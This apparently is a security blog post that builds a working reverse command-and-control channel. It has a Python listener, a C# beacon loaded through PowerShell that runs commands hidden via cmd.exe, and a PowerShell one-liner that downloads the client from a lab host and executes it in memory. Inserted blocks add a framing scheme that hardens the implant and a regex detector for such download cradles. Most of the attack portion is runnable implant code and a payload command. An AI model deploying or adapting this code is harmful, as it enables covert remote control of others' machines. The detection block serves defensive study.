Creating a Reverse C2 Channel with C#, PowerShell and Python

C2 versus Reverse / Bind Shells

Coding Reverse C2

Python C2 Handler (Server)

import socket

HOST = "0.0.0.0"   # listen on every interface
PORT = 443         # binding a port below 1024 needs root on Linux

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    # allow the handler to be restarted right after a previous run
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, PORT))
    s.listen()
    while True:
        print("Listening ...")
        conn, addr = s.accept()   # every beacon from the client is one new connection
        with conn:
            print(f"Connected by {addr}")
            cmd = input("Enter cmd ") + "\n"
            conn.sendall(cmd.encode())
            # the client writes its output and then closes the socket, so read until
            # end-of-stream; a single recv(1024) would truncate anything longer than 1 KiB
            chunks = []
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
            print(b"".join(chunks).decode(errors="replace"))

PowerShell C2 Client

$code = @"
using System;
using System.Net.Sockets;
using System.Threading;

namespace cc
{
    public class Program
    {
        // Beacon loop: connect to the handler, serve one command, sleep a random
        // interval, repeat. A handler that is down or unreachable must not kill
        // the loop, so connection errors are caught and the beacon simply retries.
        public static void Main()
        {
            while (true)
            {
                try
                {
                    Connect("192.168.126.128");
                }
                catch (SocketException)
                {
                    // handler not listening yet: wait and try again
                }
                catch (System.IO.IOException)
                {
                    // connection dropped mid-exchange
                }
                Thread.Sleep(GetRandomSleepMilliseconds());
            }
        }

        // Run one command through cmd.exe /c without a visible window and
        // return its standard output as a string.
        public static string Exec(string cmd)
        {
            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
            startInfo.FileName = "cmd.exe";
            startInfo.Arguments = "/c " + cmd;
            startInfo.UseShellExecute = false;
            startInfo.RedirectStandardOutput = true;
            // WindowStyle has no effect when UseShellExecute is false;
            // CreateNoWindow is what actually suppresses the console window.
            startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            startInfo.CreateNoWindow = true;
            using (System.Diagnostics.Process process = System.Diagnostics.Process.Start(startInfo))
            {
                string output = process.StandardOutput.ReadToEnd();
                process.WaitForExit();
                return output;
            }
        }

        // One exchange: read a command from the handler, run it, write the output
        // back, then close the connection so the handler sees end-of-stream.
        public static void Connect(string server)
        {
            Int32 port = 443;
            using (TcpClient tcpClient = new TcpClient(server, port))
            using (NetworkStream stream = tcpClient.GetStream())
            {
                var data = new Byte[256];
                Int32 bytes = stream.Read(data, 0, data.Length);
                if (bytes == 0)
                {
                    return; // handler closed without sending a command
                }
                // the handler appends a newline; strip it before handing the command to cmd.exe
                String cmd = System.Text.Encoding.ASCII.GetString(data, 0, bytes).TrimEnd('\r', '\n');
                Console.WriteLine(cmd);
                var cmdOutput = Exec(cmd);
                byte[] msg = System.Text.Encoding.ASCII.GetBytes(cmdOutput);
                stream.Write(msg, 0, msg.Length);
            }
        }

        // Sleep between beacons: uniform in [0, 10000) milliseconds, i.e. up to ten seconds.
        public static int GetRandomSleepMilliseconds()
        {
            Random rand = new Random();
            return rand.Next(10000);
        }
    }
}
"@
Add-Type -TypeDefinition $code
[cc.Program]::Main()
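The handler and client above use connection close as the only delimiter: the client writes whatever one cmd.exe run produced and hangs up, and the handler originally trusted a single recv(1024) to hold all of it, so long output (dir, systeminfo, tasklist) or output split across TCP segments gets cut off, and every command costs a fresh TCP connection. The block below is an added example, not code from the original post: a length-prefixed framing scheme, with both the handler side and the implant side written in Python and driven over a socketpair so the exchange runs offline. The 4-byte big-endian header, the MAX_FRAME limit and the fake_exec stand-in for cmd.exe /c are assumptions of this example; a C# client speaking this protocol would have to write the same 4-byte prefix before its output.

```python
import socket
import struct
import threading

# Added example, not the original post's code. Every message is a frame:
# a 4-byte big-endian length followed by exactly that many payload bytes.
HEADER = struct.Struct("!I")
MAX_FRAME = 16 * 1024 * 1024  # refuse absurd lengths before allocating a buffer


def recv_exact(sock, n):
    """Read exactly n bytes, or raise ConnectionError if the peer hangs up early."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-frame")
        buf.extend(chunk)
    return bytes(buf)


def send_frame(sock, payload):
    """Prefix the payload with its length and send the whole frame."""
    sock.sendall(HEADER.pack(len(payload)) + payload)


def recv_frame(sock):
    """Read one complete frame, however TCP happened to split it."""
    (length,) = HEADER.unpack(recv_exact(sock, HEADER.size))
    if length > MAX_FRAME:
        raise ValueError(f"frame too large: {length}")
    return recv_exact(sock, length)


def handler_side(sock, commands):
    """Handler: send each command as a frame and collect the decoded output."""
    results = {}
    for cmd in commands:
        send_frame(sock, cmd.encode())
        results[cmd] = recv_frame(sock).decode(errors="replace")
    send_frame(sock, b"exit")  # tell the implant this session is over
    return results


def implant_side(sock, exec_fn):
    """Implant: answer every command with exec_fn(cmd) until told to exit."""
    while True:
        cmd = recv_frame(sock).decode()
        if cmd == "exit":
            return
        send_frame(sock, exec_fn(cmd).encode())


def run_session(commands, exec_fn):
    """Drive both ends over a socketpair so the exchange runs offline."""
    handler_sock, implant_sock = socket.socketpair()
    worker = threading.Thread(target=implant_side, args=(implant_sock, exec_fn))
    worker.start()
    try:
        return handler_side(handler_sock, commands)
    finally:
        handler_sock.close()
        worker.join()
        implant_sock.close()


def fake_exec(cmd):
    """Constructed stand-in for cmd.exe /c; the large output proves nothing is truncated."""
    if cmd == "systeminfo":
        return "Host Name: WIN-LAB\n" + ("x" * 5000) + "\n"
    return f"unknown command: {cmd}\n"


if __name__ == "__main__":
    for cmd, text in run_session(["whoami", "systeminfo"], fake_exec).items():
        print(f"{cmd}: {len(text)} bytes received intact")
```

Because the implant answers frame by frame, one connection carries a whole session instead of one command, and the handler can tell a short output from a truncated one.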

Execution

How to reproduce?

Sample payload:

powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"

Here 192.168.126.128 is the same host that runs the Python handler; it also serves the PowerShell client above as client.ps1 over HTTP. The one-liner fetches the script and runs it in memory with Invoke-Expression (IEX), -nop (-NoProfile) skips the user's profile scripts, and -c (-Command) passes the cradle as the command to execute.
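Anyone running this payload in a lab should also know what it looks like from the defender's side, since the whole cradle lands in the command line of the powershell.exe process. The block below is an added detection example, not part of the original post: it classifies a handful of constructed command lines by the indicators a defender would key on and flags the combinations that amount to a download cradle. It generalizes beyond the page's exact payload to the spelled-out parameter forms (-NoProfile, -WindowStyle Hidden, Invoke-Expression) and to an -EncodedCommand variant; the sample lines, indicator names and thresholds are constructed for this example.

```python
import re

# Added detection example, not part of the original post. The command lines are
# constructed to resemble process-creation telemetry (e.g. the CommandLine field
# of Sysmon event 1 or Windows event 4688); the first one is the page's payload.
SAMPLE_COMMAND_LINES = [
    "powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')\"",
    "powershell.exe -NoProfile -WindowStyle Hidden -Command \"Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')\"",
    r"powershell.exe -File C:\Scripts\backup.ps1",
    "powershell -c \"(New-Object Net.WebClient).DownloadFile('https://example.test/tool.zip','C:\\tmp\\tool.zip')\"",
    # the -enc argument is the UTF-16LE base64 of "IEX (New-Object", i.e. the same cradle encoded
    "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

# Each indicator on its own is weak; the combination is what makes a cradle.
INDICATORS = {
    # in-memory execution of a string
    "exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    # fetching content from the network
    "download": re.compile(
        r"\b(?:downloadstring|downloaddata|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm)\b",
        re.IGNORECASE),
    "webclient": re.compile(r"net\.webclient", re.IGNORECASE),
    # -nop / -NoProfile: skip profile scripts that might log or alter the session
    "noprofile": re.compile(r"(?<=\s)-nop[a-z]*\b", re.IGNORECASE),
    # -w hidden / -WindowStyle Hidden
    "hidden": re.compile(r"(?<=\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob
    "encoded": re.compile(r"(?<=\s)-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE),
}


def classify(cmdline):
    """Return the set of indicator names that fire on one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_cradle(found):
    """Alert on download plus in-memory execution, or on any encoded command."""
    return ("exec" in found and "download" in found) or "encoded" in found


def scan(cmdlines):
    """Return (command line, sorted indicator names) for every line that looks like a cradle."""
    hits = []
    for line in cmdlines:
        found = classify(line)
        if is_cradle(found):
            hits.append((line, sorted(found)))
    return hits


if __name__ == "__main__":
    for line, found in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(found), "<-", line[:70])
```

The benign -File invocation and the plain DownloadFile call are left alone: download without execution is common administrative use, and alerting on either half alone is where such rules drown analysts in noise.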

Conclusion

P.S. I am not responsible for any actions performed with the POC from this blog post, video links or GitHub repos. You are responsible for your own actions. These materials are ONLY for educational purposes!

OSCP / Ethical Hacker / Vulnerability Researcher / Youtuber https://www.youtube.com/channel/UCFOc80iGpDdO1kMQHeVIFPQ

Lsec